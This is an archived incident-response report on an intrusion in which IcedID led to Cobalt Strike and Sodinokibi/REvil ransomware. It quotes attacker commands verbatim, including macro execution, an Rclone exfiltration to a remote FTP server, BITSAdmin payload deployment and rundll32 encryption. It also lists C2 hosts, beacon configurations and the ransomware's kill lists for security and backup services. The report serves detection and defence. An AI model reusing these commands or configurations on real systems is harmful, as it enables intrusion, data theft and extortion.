{
	"id": "51f92992-5537-4224-af42-59d2b9a62bf1",
	"created_at": "2026-04-06T00:12:41.347409Z",
	"updated_at": "2026-04-10T13:12:06.454Z",
	"deleted_at": null,
	"sha1_hash": "a630fbe16b63a3f1fc42a0254abc5e2b81238415",
	"title": "Sodinokibi (aka REvil) Ransomware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2453551,
	"plain_text": "Sodinokibi (aka REvil) Ransomware\r\nBy editor\r\nPublished: 2021-03-29 · Archived: 2026-04-05 21:23:21 UTC\r\nIntro\r\nSodinokibi (aka REvil) has been one of the most prolific ransomware as a service (RaaS) groups over the last couple years.\r\nThe ransomware family was purported to be behind the Travelex intrusion and current reports point to an attack against Acer\r\nfor a reported $50 million ransom demand.\r\nIn March, we observed an intrusion which started with malicious spam that dropped IcedID (Bokbot) into the environment\r\nand subsequently allowed access to a group distributing Sodinokibi ransomware. During the intrusion the threat actors\r\nescalated privileges to Domain Administrator, exfiltrated data, and used Sodinokibi to ransom all domain joined systems.\r\nCase Summary\r\nThe IcedID trojan was first discovered in 2017 and currently operates as an initial access broker for several ransomware\r\nfamilies. In our intrusion, the threat actors leveraged malicious spam using an xlsm document which, upon opening and\r\nenabling the macro, initiated a wmic command to execute the IcedID trojan from a remote executable posing as a GIF\r\nimage.\r\nPersistence was setup using a scheduled task and discovery commands were initiated from the malware within minutes of\r\nexecution. About an hour and a half after initial access, the malware pulled down Cobalt Strike Beacons from 2 different\r\ncommand and control servers, which were both used through-out the intrusion. Once the Cobalt Strike Beacons were\r\nestablished, lateral movement began, first to an Exchange server, then pivoting to other servers. We did not see the attackers\r\ninteract with the Exchange application at all; and at first, it appeared the attack came from Exchange, but after careful\r\nreview, we assessed the source was indeed IcedID. #ArtifactsMatter. It appears the threat actors wanted us to believe\r\nExchange was the source of attack as they pivoted through Exchange to other systems in the domain using Cobalt Strike.\r\nAfter compromising the Exchange server, the attackers moved to domain controllers and other systems within the\r\nenvironment using SMB and PowerShell Beacons executed via a remote service. The attackers were slightly slowed down\r\nby AntiVirus, which ate a couple Beacons but the attackers eventually bypassed it using a variation of their lateral movement\r\ntechnique.\r\nAdditional discovery was executed from the domain controller using AdFind and the Ping utility to test connections between\r\nthe domain controller and other domain joined systems. After discovery was completed, credentials were dumped from\r\nlsass. After completing these tasks the threat actors began to establish RDP connections between various systems in the\r\ndomain.\r\nThree and a half hours into the intrusion, the threat actors used Rclone masquerading as a svchost executable to collect and\r\nexfiltrate the contents of network shares for use in a double extortion demand.\r\nAt the four hour mark, the threat actors began to move on to final objectives. They staged the ransomware executable on a\r\ndomain controller and then used BITSAdmin to download it to each system in the domain. After that, the threat actors used\r\nRDP to open a cmd or PowerShell process to then execute the Sodinokibi ransomware using a particular flag -smode, which\r\nwhen executed, wrote a couple RunOnce registry keys and then immediately rebooted the system into Safe Mode with\r\nNetworking. Encryption did not start immediately after reboot but required a user to log in, which in this case the threat\r\nactors completed by logging in after the reboot.\r\nBooting into Safe Mode with Networking blocked the startup of security tools and other management agents. Networking\r\nworked, but because services couldn’t start, we were unable to remotely manage the systems using our normal tools. We\r\nbelieve this process would have stopped some EDR agents from starting up and possibly detecting the ransomware\r\nexecution.\r\nOn certain systems, ransomware was executed without the -smode flag, and on other systems a dll was executed via\r\nrundll32 to encrypt the system without requiring a reboot and allowing the threat actors to remain present while the\r\nencryption process completed.\r\nhttps://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\r\nPage 1 of 27\n\nAbout 4.5 hours after initial access, the threat actors had completed their mission of encrypting all domain joined systems.\r\nThe ransomware note left by the infection included a link to their site on Tor which put the price tag for decryption around\r\n$200k if paid within 7 days. If we didn’t pay within 7 days the price goes up to around $400k. The ransom is required to be\r\npaid in Monero instead of the usual Bitcoin. This may be in an effort to better shield the payments from tracing activity like\r\nthose performed by Chainaylsis. The threat actors identified themselves on their site as Sodinokibi and linked to a Coveware\r\nblog to provide assurance that if paid their decryption would be successful.\r\nServices\r\nOur Threat Feed service picked up one of the two Cobalt Strike servers one day before this intrusion occurred and the other\r\nIP was added to the feed as soon as we recognized it.\r\nWe also have artifacts available from this case such as ransomware samples (dll and exe), pcaps, memory captures, files,\r\nKape packages and more, under our Security Researcher and Organization services.\r\nTimeline\r\nhttps://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\r\nPage 2 of 27\n\nhttps://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\r\nPage 3 of 27\n\nMITRE ATT\u0026CK\r\nInitial Access\r\nInitial access for this intrusion was via a malspam campaign, while expecting Qbot downloads we found that IcedID was the\r\npayload choice delivered this time, similar to activity noted recently by James Quinn.\r\nThe delivery format was an xlsm file:\r\nInitial execution of the document writes a file to:\r\nC:\\Users\\Public\\microsoft.security\r\nThe Excel file called wmic to execute the file with regsrv32\r\nwmic.exe process call create 'regsvr32 -s C:\\Users\\Public\\microsoft.security'\r\nThis then made a network request to download a file from this URL\r\nhttp://vpu03jivmm03qncgx.com/index.gif\r\nThe GIF however was the IcedID malware.\r\nhttps://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\r\nPage 4 of 27\n\nExecution\r\nOnce IcedID was downloaded to the host, the malware was executed using rundll32.exe\r\nrundll32.exe \"C:\\Users\\USERNAME\\AppData\\Local\\Temp\\skull-x64.dat\",update /i:\"DwarfWing\\license.dat\"\r\nAfter execution, the malware made contact with 161.35.109[.]168 which it continued to beacon to, throughout the intrusion.\r\nPersistence\r\nIcedID setup persistence on the beach head host using a scheduled task.\r\nwewouwquge_{A3112501-520A-8F32-871A-380B92917B3D}\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\wewouwquge_{A3112501-5\r\nhttps://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\r\nPage 5 of 27\n\nThe execution of the ransomware executable created a RunOnce key for persistence.\r\nHKLM\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*AstraZeneca\r\nPrivilege Escalation\r\nAfter completing LDAP discovery (BloodHound), the Cobalt Strike Beacon running in the wuauclt.exe process executed\r\nseveral PowerShell functions for UAC bypasses including:\r\nUAC-TokenMagic\r\nInvoke-SluiBypass\r\nDefense Evasion\r\nAbout one and a half hours after initial access, IcedID reached out to two Cobalt Strike servers.\r\nProcess injection was used multiple times across the environment using Cobalt Strike Beacons.\r\nhttps://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\r\nPage 6 of 27\n\nPrior to executing the ransomware, the threat actors created a GPO to disable Windows Defender across all systems/OUs.\r\nThe GPO was named “new”.\r\nCredential Access\r\nCredentials were dumped on a server and domain controller using a Cobalt Strike Beacon.\r\nhttps://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\r\nPage 7 of 27\n\nDiscovery\r\nInitial discovery by the IcedID malware occurred within minutes of execution:\r\ncmd.exe /c chcp \u003e\u00262\r\nWMIC.exe WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get * /Format:List\r\nipconfig.exe ipconfig /all\r\nsysteminfo\r\nnet config workstation\r\nnltest /domain_trusts\r\nnltest /domain_trusts /all_trusts\r\nnet view /all /domain\r\nnet view /all\r\nnet.exe net group \"Domain Admins\" /domain\r\nA flurry of LDAP queries were seen coming from wuauclt.exe (Cobalt Strike) on the beachhead.\r\n\"DistinguishedName\": \"CN=Terminal Server License Servers,CN=Builtin,DC=DomainName,DC=local\", \"ScopeOfSearch\":\r\n\"DistinguishedName\": \"CN=RAS and IAS Servers,CN=Users,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"Base\", \"Searc\r\n\"DistinguishedName\": \"CN=Incoming Forest Trust Builders,CN=Builtin,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"\r\n\"DistinguishedName\": \"CN=Account Operators,CN=Builtin,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"Base\", \"Searc\r\n\"DistinguishedName\": \"CN=Cert Publishers,CN=Users,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"Base\", \"SearchFil\r\n\"DistinguishedName\": \"CN=Server Operators,CN=Builtin,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"Base\", \"Search\r\n\"DistinguishedName\": \"CN=Storage Replica Administrators,CN=Builtin,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"\r\n\"DistinguishedName\": \"CN=Hyper-V Administrators,CN=Builtin,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"Base\", \"\r\n\"DistinguishedName\": \"CN=Remote Management Users,CN=Builtin,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"Base\",\r\n\"DistinguishedName\": \"CN=Access Control Assistance Operators,CN=Builtin,DC=DomainName,DC=local\", \"ScopeOfSearc\r\nhttps://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\r\nPage 8 of 27\n\n\"DistinguishedName\": \"CN=RDS Management Servers,CN=Builtin,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"Base\", \"\r\n\"DistinguishedName\": \"CN=RDS Endpoint Servers,CN=Builtin,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"Base\", \"Se\r\n\"DistinguishedName\": \"CN=Event Log Readers,CN=Builtin,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"Base\", \"Searc\r\n\"DistinguishedName\": \"CN=RDS Remote Access Servers,CN=Builtin,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"Base\"\r\n\"DistinguishedName\": \"CN=Certificate Service DCOM Access,CN=Builtin,DC=DomainName,DC=local\", \"ScopeOfSearch\":\r\n\"DistinguishedName\": \"CN=Performance Log Users,CN=Builtin,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"Base\", \"S\r\n\"DistinguishedName\": \"CN=Cryptographic Operators,CN=Builtin,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"Base\",\r\n\"DistinguishedName\": \"CN=Distributed COM Users,CN=Builtin,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"Base\", \"S\r\n\"DistinguishedName\": \"CN=Network Configuration Operators,CN=Builtin,DC=DomainName,DC=local\", \"ScopeOfSearch\":\r\n\"DistinguishedName\": \"CN=Performance Monitor Users,CN=Builtin,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"Base\"\r\n\"DistinguishedName\": \"CN=Remote Desktop Users,CN=Builtin,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"Base\", \"Se\r\n\"DistinguishedName\": \"CN=Replicator,CN=Builtin,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"Base\", \"SearchFilter\r\n\"DistinguishedName\": \"CN=Backup Operators,CN=Builtin,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"Base\", \"Search\r\n\"DistinguishedName\": \"CN=Print Operators,CN=Builtin,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"Base\", \"SearchF\r\n\"DistinguishedName\": \"CN=Infra,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"Base\", \"SearchFilter\": \"member=*\" }\r\n\"DistinguishedName\": \"CN=ExchangeLegacyInterop,OU=Microsoft Exchange Security Groups,DC=DomainName,DC=local\",\r\n\"DistinguishedName\": \"CN=Security Administrator,OU=Microsoft Exchange Security Groups,DC=DomainName,DC=local\"\r\n\"DistinguishedName\": \"CN=Security Reader,OU=Microsoft Exchange Security Groups,DC=DomainName,DC=local\", \"Scope\r\n\"DistinguishedName\": \"CN=Compliance Management,OU=Microsoft Exchange Security Groups,DC=DomainName,DC=local\",\r\n\"DistinguishedName\": \"CN=Discovery Management,OU=Microsoft Exchange Security Groups,DC=DomainName,DC=local\", \"\r\n\"DistinguishedName\": \"CN=Hygiene Management,OU=Microsoft Exchange Security Groups,DC=DomainName,DC=local\", \"Sc\r\n\"DistinguishedName\": \"CN=Delegated Setup,OU=Microsoft Exchange Security Groups,DC=DomainName,DC=local\", \"Scope\r\n\"DistinguishedName\": \"CN=Records Management,OU=Microsoft Exchange Security Groups,DC=DomainName,DC=local\", \"Sc\r\n\"DistinguishedName\": \"CN=Help Desk,OU=Microsoft Exchange Security Groups,DC=DomainName,DC=local\", \"ScopeOfSear\r\n\"DistinguishedName\": \"CN=UM Management,OU=Microsoft Exchange Security Groups,DC=DomainName,DC=local\", \"ScopeOf\r\n\"DistinguishedName\": \"CN=Public Folder Management,OU=Microsoft Exchange Security Groups,DC=DomainName,DC=local\r\n\"DistinguishedName\": \"CN=View-Only Organization Management,OU=Microsoft Exchange Security Groups,DC=DomainName\r\n\"DistinguishedName\": \"CN=DnsUpdateProxy,CN=Users,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"Base\", \"SearchFilt\r\n\"DistinguishedName\": \"CN=Recipient Management,OU=Microsoft Exchange Security Groups,DC=DomainName,DC=local\", \"\r\n\"DistinguishedName\": \"CN=Protected Users,CN=Users,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"Base\", \"SearchFil\r\n\"DistinguishedName\": \"CN=Cloneable Domain Controllers,CN=Users,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"Base\r\n\"DistinguishedName\": \"CN=Enterprise Key Admins,CN=Users,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"Base\", \"Sea\r\n\"DistinguishedName\": \"CN=Key Admins,CN=Users,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"Base\", \"SearchFilter\"\r\n\"DistinguishedName\": \"CN=Domain Guests,CN=Users,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"Base\", \"SearchFilte\r\n\"DistinguishedName\": \"CN=Enterprise Read-only Domain Controllers,CN=Users,DC=DomainName,DC=local\", \"ScopeOfSea\r\n\"DistinguishedName\": \"CN=Read-only Domain Controllers,CN=Users,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"Base\r\n\"DistinguishedName\": \"CN=Domain Computers,CN=Users,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"Base\", \"SearchFi\r\n\"DistinguishedName\": \"CN=Domain Users,CN=Users,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"Base\", \"SearchFilter\r\n\"DistinguishedName\": \"CN=Domain Controllers,CN=Users,DC=DomainName,DC=local\", \"ScopeOfSearch\": \"Base\", \"Search\r\nWe believe that activity was related to a Bloodhound scan, as seconds later we see BloodHound results dropped to disk\r\nbefore being deleted. \r\nhttps://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\r\nPage 9 of 27\n\nOnce on the Exchange server in the environment, the threat actor performed DNS requests for all domain joined systems and\r\npinged a few to check connectivity.\r\nAdFind was executed on a domain controller to gather additional info such as name, OS, and DNS name.\r\nhttps://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\r\nPage 10 of 27\n\ncmd.exe /C adfind.exe -f objectcategory=computer -csv name cn OperatingSystem dNSHostName \u003e some.csv\r\nLateral Movement\r\nFor lateral movement, the threat actors used various techniques across the domain, one method being Cobalt Strike.\r\nhttps://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\r\nPage 11 of 27\n\nCobalt Strike Beacon executables were transferred using SMB and executed via a remote service.\r\nOn other systems, PowerShell was used with the same remote service execution.\r\nTo facilitate the final ransomware deployment, RDP connections were initiated from a domain controller as well as a\r\nsecondary server in the environment.\r\nCollection\r\nThe Rclone utility was used to collect information from file shares and to exfiltrate the data.\r\nsvchost.exe --config svchost.conf --progress --no-check-certificate copy \"\\\\ServerName\\C$\\ShareName\" ftp1:/Do\r\nCommand and Control\r\nIcedID:\r\nhttps://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\r\nPage 12 of 27\n\ncikawemoret34.space\r\n206.189.10.247:80\r\nnomovee.website\r\n161.35.109.168:443\r\nJA3: a0e9f5d64349fb13191bc781f81f42e1\r\nJA3s: ec74a5c51106f0419184d0dd08fb05bc\r\nCertificate:[e0:fc:e5:eb:fd:e7:da:0b:93:ac:dc:df:0d:e8:56:cc:7b:f2:58:43 ]\r\nNot Before: 2021/03/11 02:06:51\r\nNot After: 2022/03/11 02:06:51\r\nIssuer Org: Internet Widgits Pty Ltd\r\nSubject Common: localhost\r\nSubject Org: Internet Widgits Pty Ltd\r\nPublic Algorithm: rsaEncryption\r\nCobalt Strike:\r\n45.86.163.78:443\r\ncloudmetric.online\r\nJA3:a0e9f5d64349fb13191bc781f81f42e1\r\nJA3s: ae4edc6faf64d08308082ad26be60767\r\nCertificate:[b9:2c:48:71:1a:ba:eb:99:15:c4:0b:b0:31:ce:14:8e:a9:30:ac:d3 ]\r\nNot Before: 2021/02/27 06:45:42\r\nNot After: 2021/05/28 07:45:42\r\nIssuer Org: Let's Encrypt\r\nSubject Common: cloudmetric.online [cloudmetric.online]\r\nPublic Algorithm: rsaEncryption\r\nCobalt Config:\r\n{\r\n\"x64\": {\r\n\"config\": {\r\n\"HTTP Method Path 2\": \"/jquery-3.2.2.full.js\",\r\n\"Beacon Type\": \"0 (HTTP)\",\r\n\"Method 2\": \"POST\",\r\n\"Polling\": 48963,\r\n\"Jitter\": 24,\r\n\"Spawn To x64\": \"%windir%\\\\sysnative\\\\WUAUCLT.exe\",\r\n\"Spawn To x86\": \"%windir%\\\\syswow64\\\\WUAUCLT.exe\",\r\n\"Method 1\": \"GET\",\r\n\"C2 Server\": \"cloudmetric.online,/jquery-3.2.2.min.js,45.86.163.78,/jquery-3.2.2.min.js\",\r\n\"Port\": 80\r\n},\r\n\"sha256\": \"8d44894c09a2e30b40927f8951e01708d0a600813387c3c0872bcd6cb10a3e8c\",\r\n\"sha1\": \"deab6be62e9c9793f9874bbdec9ff0a3acb82ad8\",\r\n\"md5\": \"28ceee1f8f529a80bd0ff5e52240e404\",\r\n\"time\": 1615840900656.6\r\n},\r\n\"x86\": {\r\n\"config\": {\r\n\"HTTP Method Path 2\": \"/jquery-3.2.2.full.js\",\r\n\"Beacon Type\": \"0 (HTTP)\",\r\n\"Method 2\": \"POST\",\r\n\"Polling\": 48963,\r\n\"Jitter\": 24,\r\n\"Spawn To x64\": \"%windir%\\\\sysnative\\\\WUAUCLT.exe\",\r\n\"Spawn To x86\": \"%windir%\\\\syswow64\\\\WUAUCLT.exe\",\r\n\"Method 1\": \"GET\",\r\n\"C2 Server\": \"cloudmetric.online,/jquery-3.2.2.min.js,45.86.163.78,/jquery-3.2.2.min.js\",\r\n\"Port\": 80\r\nhttps://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\r\nPage 13 of 27\n\n},\r\n\"sha256\": \"11af3609884ad674a1c86f42ec27719094e935d357d73e574b75c787a0e8c0f1\",\r\n\"sha1\": \"a30de5ca8a107fd69c8885a975224ea8ff261002\",\r\n\"md5\": \"bbc6592c67d233640a9ca0d0d915003c\",\r\n\"time\": 1615840895189\r\n}\r\n}\r\n195.189.99.74\r\nsmalleststores.com\r\nJA3: 72a589da586844d7f0818ce684948eea\r\nJA3s: ae4edc6faf64d08308082ad26be60767\r\nCertificate: [14:f4:79:e3:fd:98:21:60:68:fd:1c:0a:e6:c6:f9:71:f4:ac:f9:df]\r\nNot Before: 2021/03/11 11:02:43\r\nNot After: 2021/06/09 12:02:43\r\nIssuer Org: Let's Encrypt\r\nSubject Common: smalleststores.com [smalleststores.com]\r\nPublic Algorithm: rsaEncryption\r\nCobalt Config:\r\n{\r\n\"x86\": {\r\n\"config\": {\r\n\"Method 1\": \"GET\",\r\n\"Method 2\": \"GET\",\r\n\"Spawn To x86\": \"%windir%\\\\syswow64\\\\mstsc.exe\",\r\n\"C2 Server\": \"smalleststores.com,/owa/,195.189.99.74,/owa/\",\r\n\"Beacon Type\": \"8 (HTTPS)\",\r\n\"Polling\": 59713,\r\n\"Jitter\": 41,\r\n\"Port\": 443,\r\n\"Spawn To x64\": \"%windir%\\\\system32\\\\calc.exe\",\r\n\"HTTP Method Path 2\": \"/OWA/\"\r\n},\r\n\"md5\": \"88365eb3d504f570f22d76f777ab2caf\",\r\n\"sha256\": \"4b25f708c506e0cc747344ee79ecda48d51f6c25c9cb45ceb420575458f56720\",\r\n\"sha1\": \"f42f2eea6cf88d30cfd6207182528be6ae2e504f\",\r\n\"time\": 1615846680369.8\r\n},\r\n\"x64\": {\r\n\"config\": {\r\n\"Method 1\": \"GET\",\r\n\"Method 2\": \"GET\",\r\n\"Spawn To x86\": \"%windir%\\\\syswow64\\\\mstsc.exe\",\r\n\"C2 Server\": \"smalleststores.com,/owa/,195.189.99.74,/owa/\",\r\n\"Beacon Type\": \"8 (HTTPS)\",\r\n\"Polling\": 59713,\r\n\"Jitter\": 41,\r\n\"Port\": 443,\r\n\"Spawn To x64\": \"%windir%\\\\system32\\\\calc.exe\",\r\n\"HTTP Method Path 2\": \"/OWA/\"\r\n},\r\n\"md5\": \"27ca24a7f6d02539235d46e689e6e4ac\",\r\n\"sha256\": \"e35c31ba3e10f59ae7ea9154e2c0f6f832fcff22b959f65b607d6ba0879ab641\",\r\n\"sha1\": \"6885d84c1843c41ff8197d7ab0c8e42e20a7ecaa\",\r\n\"time\": 1615846684589\r\n}\r\n}\r\nExfiltration\r\nhttps://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\r\nPage 14 of 27\n\nData that was collected from the domain was exfiltrated to a remote server at:\r\nImpact\r\nFor the final actions, the threat actors dropped a ransomware executable on the domain controller in C:\\Windows and then\r\nused BITSAdmin to deploy the executable to remote systems.\r\nC:\\Windows\\system32\\bitsadmin.exe /transfer debjob /download /priority normal \\\\DOMIANCONTROLLER\\c$\\windows\\DO\r\nThe -smode flag was used with the ransomware executable to set the system to reboot into Safe Mode with Networking as\r\nnoted by Malwarehunterteam.\r\nSee below for -smode execution:\r\nhttps://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\r\nPage 15 of 27\n\nThe *franceisshit key was used to boot the machine out of Safe Mode upon restarting the machine.\r\nThe systems rebooted into Safe Mode with Networking after running this smode command and were left at a login screen.\r\nAbout 10-20 seconds after logging in, all user files were encrypted and a ransom note was placed in numerous locations\r\nincluding the Desktop. Services were not able to be started, which led to collection issues, as normal agents did not start.\r\nThis also included the startup of EDR and management agents.\r\nWe’ve seen at least one tweet about smode setting auto login keys, but we did not see that in our case and were not able to\r\nrecreate that situation.\r\nAfter rebooting out of Safe Mode, you are left with the following desktop:\r\nhttps://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\r\nPage 16 of 27\n\nOn certain systems, like the domain controllers, the threat actors chose to not use the Safe Mode option, and instead they\r\nused a dll executed by rundll32 to encrypt the system with no reboot, allowing the threat actors to maintain access while the\r\nransomware was encrypting files.\r\nC:\\Windows\\system32\\rundll32.exe\" C:\\Windows\\DomainName.dll,DllRegisterServer\r\nThe threat actors asked for 200k in Monero. They were talked down 20-30% and could have been talked down more. Here’s\r\na few screenshots from the website.\r\nhttps://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\r\nPage 17 of 27\n\nhttps://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\r\nPage 18 of 27\n\nWith the help of @hatching_io (https://tria.ge/) we were able to parse the config from the ransomware sample.\r\nCampaign ID (sub): 7114\r\nnet: false\r\nList of processes to kill (prc)\r\noracle\r\nklnagent\r\nmydesktopqos\r\ninfopath\r\nBackupExtender\r\npowerpnt\r\noutlook\r\nBackupAgent\r\nSmc\r\nsql\r\nccSvcHst\r\nBackupUpdater\r\nRtvscan\r\nhttps://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\r\nPage 19 of 27\n\nwinword\r\nkavfsscs\r\nocssd\r\nisqlplussvc\r\nvisio\r\nShadowProtectSvc\r\ntbirdconfig\r\nTSSchBkpService\r\ndbeng50\r\nccSetMgr\r\nagntsvc\r\nSage.NA.AT_AU.SysTray\r\ndbsnmp\r\nthebat\r\nonenote\r\nAmitiAvSrv\r\nwordpad\r\nmsaccess\r\navgadmsv\r\nthunderbird\r\nBackupMaint\r\nMicrosoft.exchange.store.worker.exe\r\nCarboniteUI\r\nexcel\r\nSPBBCSvc\r\nLogmeInBackupService\r\nencsvc\r\nocomm\r\nsqbcoreservice\r\nNSCTOP\r\nmydesktopservice\r\nkavfs\r\nkavfswp\r\nocautoupds\r\nmspub\r\nxfssvccon\r\nDLOAdminSvcu\r\nsynctime\r\nlmibackupvssservice\r\nfirefox\r\nsteam\r\ndlomaintsvcu\r\nList of services to kill\r\nTelemetryserver\r\n\"Sophos AutoUpdate Service\"\r\nsophos\r\nAltaro.Agent.exe\r\nmysqld\r\nMSSQL$MSGPMR\r\n\"SophosFIM\"\r\n\"Sophos Web Control Service\"\r\nSQLWriter\r\nsvcGenericHost\r\nAltiBack\r\n\"SQLServer Analysis Services (MSSQLSERVER)\"\r\nBackupExecAgentAccelerator\r\n\"StorageCraft ImageReady\"\r\nSQLTELEMETRY\r\nAzureADConnectAuthenticationAgent\r\nntrtscan\r\nds_notifier\r\nTeamViewer\r\nhttps://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\r\nPage 20 of 27\n\n\"StorageCraft Raw Agent\"\r\n\"StorageCraft Shadow Copy Provider\"\r\nSQLTELEMETRY$SQLEXPRESS\r\nVeeamHvIntegrationSvc\r\nAltiCTProxy\r\nMsDtsServer130\r\nViprePPLSvc\r\nMcAfeeFramework\r\nMSSQL$QM\r\n\"swi_service\"\r\n\"ThreadLocker\"\r\nofcservice\r\nAUService\r\nsophossps\r\nAzureADConnectHealthSyncMonitor\r\nAltaro.OffsiteServer.UI.Service.exe\r\n\"SAVAdminService\"\r\nds_monitor\r\nALTIVRM\r\nSSASTELEMETRY\r\nTmCCSF\r\nMsDtsServer110\r\n\"Sophos MCS Client\"\r\nTMBMServer\r\nSBAMSvc\r\nmfewc\r\n\"Sophos System Protection Service\"\r\nMSSQLFDLauncher$TESTBACKUP02DEV\r\nVeeamDeploymentService\r\nmasvc\r\nbackup\r\nMSSQL$SQLEXPRESS\r\nAltiPhoneServ\r\nMSSQLServerOLAPService\r\nSSISTELEMETRY130\r\nVeeamEndpointBackupSvc\r\nmepocs\r\nAltaro.UI.Service.exe\r\n\"ds_agent\"\r\nHuntressUpdater\r\nMSSQLFDLauncher\r\n\"Sophos File Scanner Service\"\r\nSQLAgent$MSGPMR\r\nADSync\r\nKaseyaAgent\r\nReportServer\r\nMSSQLFDLauncher$SQLEXPRESS\r\nMSSQL$HPWJA\r\nKaseyaAgentEndpoint\r\nVeeamTransportSvc\r\n\"ds_monitor\"\r\nmfevtp\r\nMSSQLTESTBACKUP02DEV\r\nSQLTELEMETRY$MSGPMR\r\nThreadLocker\r\nMSSQLServerADHelper100\r\nveeam\r\ntmlisten\r\nAzureADConnectHealthSyncInsights\r\n\"swi_filter\"\r\nMsDtsServer120\r\nProtectedStorage\r\nVeeamDeploySvc\r\nmemtas\r\nds_agent\r\nhttps://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\r\nPage 21 of 27\n\nVeeamMountSvc\r\nHuntressAgent\r\nSQLAgent$SQLEXPRESS\r\nbedbg\r\nMSSQLSERVER\r\n\"ofcservice\"\r\nVipreAAPSvc\r\n\"Sophos Endpoint Defense Service\"\r\nKACHIPS906995744173948\r\nDsSvc\r\nMSSQLLaunchpad$SQLEXPRESS\r\nmsseces\r\nmacmnsvc\r\nLTService\r\nCode42Service\r\nAltaro.HyperV.WAN.RemoteService.exe\r\nLTSvcMon\r\nMSSQL$SQLEXPRESSADV\r\n\"SAVService\"\r\nAltaro.OffsiteServer.Service.exe\r\n\"Sage 100cloud Advanced 2020 (9920)\"\r\nAltaro.SubAgent.exe\r\nmfemms\r\n\"TeamViewer\"\r\n\"SQLServer Reporting Services (MSSQLSERVER)\"\r\nVSS\r\nsql\r\nAltaro.SubAgent.N2.exe\r\n\"SQLServer Integration Services 12.0\"\r\nSQLSERVERAGENT\r\nvss\r\n\"Sophos Safestore Service\"\r\nklnagent\r\n\"Sage.NA.AT_AU.Service\"\r\nMBAMService\r\n\"Sophos Health Service\"\r\nSQLBrowser\r\nMySQL\r\n\"ProtectedStorage\"\r\n\"Sophos Clean Service\"\r\n\"Sage 100c Advanced 2017 (9917)\"\r\n\"SntpService\"\r\nVeeamNFSSvc\r\nKAVFS\r\nSQLEXPRESSADV\r\nKAENDCHIPS906995744173948\r\nsppsvc\r\nAmsp\r\npsqlWGE\r\nMicrosoft.exchange.store.worker.exe\r\nkavfsscs\r\n\"Amsp\"\r\nsqlservr\r\nAltaro.DedupService.exe\r\nsvc$\r\n\"ds_notifier\"\r\n\"Sophos Device Control Service\"\r\nAzureADConnectAgentUpdater\r\nAltiFTPUploader\r\n\"Sophos MCS Agent\"\r\nTriage sandbox run of the executable without smode:\r\nhttps://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\r\nPage 22 of 